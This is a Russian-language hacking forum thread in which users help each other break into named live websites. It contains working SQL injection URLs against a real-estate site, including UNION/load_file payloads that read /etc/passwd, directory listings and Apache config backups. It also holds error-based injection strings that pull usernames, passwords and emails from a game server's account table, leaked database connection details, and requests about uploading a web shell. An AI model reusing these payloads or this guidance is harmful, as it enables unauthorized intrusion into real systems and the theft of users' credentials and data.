Code: http://5788sagebrookdrive.com/property-details?mls=-1'+/*!uNIoN*/+(/*!SelEcT*/+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,concat(0x3a3a3a3a3a,database(),0x3a3a3a3a3a),1+)+--+;&src=1 Как узнать где сайт лежит?
+ еще раскрытия http://5788sagebrookdrive.com/inc/config.php http://5788sagebrookdrive.com/file_upload.php
Все хорошо, но Code: _SERVER["SCRIPT_FILENAME"] /home/lwdhost/www/live.realcove.com/index.php http://5788sagebrookdrive.com/phpinfo.php Br@!ns Аналогично, /etc/passwd,говорит как раз что www-юзер имеет /home/lwdhost. ---------- спасибо на этом хотя бы
радость-то какая, наконец-то могу пощупать эту фишку freebsd: Code: http://5788sagebrookdrive.com/property-details?mls=-1%27+/*!uNIoN*/+%28/*!SelEcT*/+123,123,load_file%28%27/etc/%27%29,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,123,1+%29+--+;&src=1 т. е. при чтении директории получаете список файлов и папок директория /home/lwdhost/ Code: http://5788sagebrookdrive.com/property-details?mls=-1%27+/*!uNIoN*/+%28/*!SelEcT*/+123,123,load_file%28%27/home/lwdhost/%27%29,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,123,1+%29+--+;&src=1 почему такая ерунда с папками? в httpd прописаны алиасы: Code: http://5788sagebrookdrive.com/property-details?mls=-1%27+/*!uNIoN*/+%28/*!SelEcT*/+1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,load_file%28%27/home/MPS.httpd.conf.bk25oct2010%27%29,1+%29+--+;&src=1 Code: addisonklein advancedlabs brian brian1 cameron canon-copier coldwellca cortexx dns formbuilder grijalva impact jennie jira lwdhost mayer mlsimages olyins outgoing pcmls puddlejumpers riverbendranch ryanm steve1 tara theofficialjeff tyler unixsa vera koliopoulos gsmls MPS.httpd.conf.bk25oct2010 MPS.php.ini.bk25oct2010 VPS.httpd.conf.bk25oct2010 VPS.php.ini.bk25oct2010 нужно перебрать все папки и найти доступную на чтение и запись, заодно найти httpd.conf и найти для каждого document_root
в magento конфиге (local.xml) есть вот такая запись, ниже данных Mysql: Spoiler: code <backend_options> <server> <![CDATA[154aa11236c94e56a08ba446a89f4ae4.publb.rackspaceclouddb.com]]> </server> <port> <![CDATA[52412]]> </port> <database> <![CDATA[0]]> </database> <password> *password* </password> Что она означает? и как можно подключиться по этим данным?
Помогите составить запрос в бд плиз) ситуация следующая, есть скуля необходимо узнать название колонки в которой имеется значение 3.00 для юзера с id=6010.
SELECT * FROM таблица_с_юзерами WHERE id = 6010. в ответе получите все данные по пользователю и узнаете имя колонки
Хелп плз при попытке выполнить 25'or(ExtractValue(1,concat(0x5C,(select(SUBSTRING(group_concat(count(*)),1))from(realmd.account)))))and(1)='1 появляется ошибка Query failed : FUNCTION realmd.ExtractValue does not exist Как я понял, в этой версии mysql еще нет функции ExtractValue. Какие есть альтернативы? P.S. 25'OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select concat_ws(0x3a,username,password,email) from account limit 0,1), 1, 63), FLOOR(RAND(0)*2)))and(1)='1 проходит, выводит: 5.0.67-log
По по воду версий https://dev.mysql.com/doc/refman/5.1/en/xml-functions.html. Если остальные техники вывода не отрабатывают, используйте вывод через ошибку группировки.
через union? Он, там тоже не работает, поскольку запрос выглядит примерно так: INSERT INTO account VALUES (username,password,email); И вроде как, union работает только на Select, или я ошибаюсь? Вообще, вот уязвимый сайт, который пытаюсь взломать... http://wow.kwinta.net/index.php?id=registration.html Уязвимо поле ввода имени аккаунта...
как бы я не пытался его сунуть, появляется ошибка You have an error in your SQL syntax... Не подскажете, как в моем случае его нужно правильно применять?
Возможно залить сюда шелл? http://www.printclick.ru/userupload.html?ident=1 фильтрацыя неособая. мне ума нехватает. обясните пожалуста.
http://www.alice.ch/en/sveb/service...[enddate]=&tx_events_pi_search[search]=Search Фильтр обходится?
всем привет, 2 года пытаюсь взломать нужные мне сайты, но все тщетно.. сегодня ночью прогонял один сайт через Acunetix, выдало вот такие алерты, можно ли их как-то поюзать или фигня? я давно не затрагивал инъекции и поэтому позабыл уже что и как, на сайте фильтруется запрос " ' " и выползает на его месте %27...
